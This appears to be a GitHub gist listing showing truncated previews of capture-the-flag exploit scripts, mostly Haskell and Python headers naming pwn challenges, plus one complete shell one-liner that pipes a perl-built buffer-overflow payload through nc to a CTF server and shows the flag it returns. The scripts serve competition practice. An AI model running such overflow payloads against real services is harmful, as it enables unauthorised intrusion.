This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc --package pwn | |
-- HITCON CTF 2016 Quals: Secret Holder | |
-- https://github.com/ctfs/write-ups-2016/tree/master/hitcon-ctf-2016/pwn/secret-holder-100 | |
-- tested env: | |
-- $ cat /etc/os-release | |
-- NAME="Ubuntu" | |
-- VERSION="16.04.3 LTS (Xenial Xerus)" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc --package pwn | |
-- 31C3 CTF: mynx | |
-- https://github.com/ctfs/write-ups-2014/tree/master/31c3-ctf-2014/pwn/mynx | |
-- tested env: | |
-- $ cat /etc/os-release | |
-- NAME="Ubuntu" | |
-- VERSION="16.04.3 LTS (Xenial Xerus)" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc --package pwn | |
-- 32C3 CTF: readme | |
-- https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/pwn/readme-200 | |
-- tested env: | |
-- $ cat /etc/os-release | |
-- NAME="Ubuntu" | |
-- VERSION="16.04.3 LTS (Xenial Xerus)" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc --package pwn | |
-- PlaidCTF 2014: kappa | |
-- https://github.com/ctfs/write-ups-2014/tree/master/plaid-ctf-2014/kappa | |
-- tested env: | |
-- $ cat /etc/os-release | |
-- NAME="Ubuntu" | |
-- VERSION="16.04.3 LTS (Xenial Xerus)" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc --package pwn | |
-- HITCON CTF 2014: stkof | |
-- https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof | |
-- tested env: | |
-- $ cat /etc/os-release | |
-- NAME="Ubuntu" | |
-- VERSION="16.04.3 LTS (Xenial Xerus)" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# Tokyo Westerns CTF 3rd 2017: Just do it! | |
perl -e 'print "A" x (0x20-0xc-0x1) . "\x00\x80\xa0\x04\x08\n"' | nc pwn1.chal.ctf.westerns.tokyo 12345 | |
# $ ./exploit.sh | |
# Welcome my secret service. Do you know the password? | |
# Input the password. | |
# TWCTF{pwnable_warmup_I_did_it!} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc --package pwn | |
-- Tokyo Westerns CTF 3rd 2017: Palindromes Pairs - Coding Phase - | |
{-# LANGUAGE OverloadedStrings #-} | |
import Control.Monad | |
import qualified Data.ByteString.Char8 as BS | |
import Data.Monoid ((<>)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# Tokyo Westerns CTF 3rd 2017: Rev Rev Rev | |
# | |
# ref: https://github.com/angr/angr-doc/blob/master/examples/defcon2016quals_baby-re_0/solve.py | |
import angr | |
def main(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc --package pwn | |
-- 0ctf Quals 2017: Baby Heap 2017 | |
-- https://github.com/ctfs/write-ups-2017/tree/master/0ctf-quals-2017/pwn/Baby-Heap-2017-255 | |
{-# LANGUAGE OverloadedStrings #-} | |
import Control.Monad | |
import Data.Bits |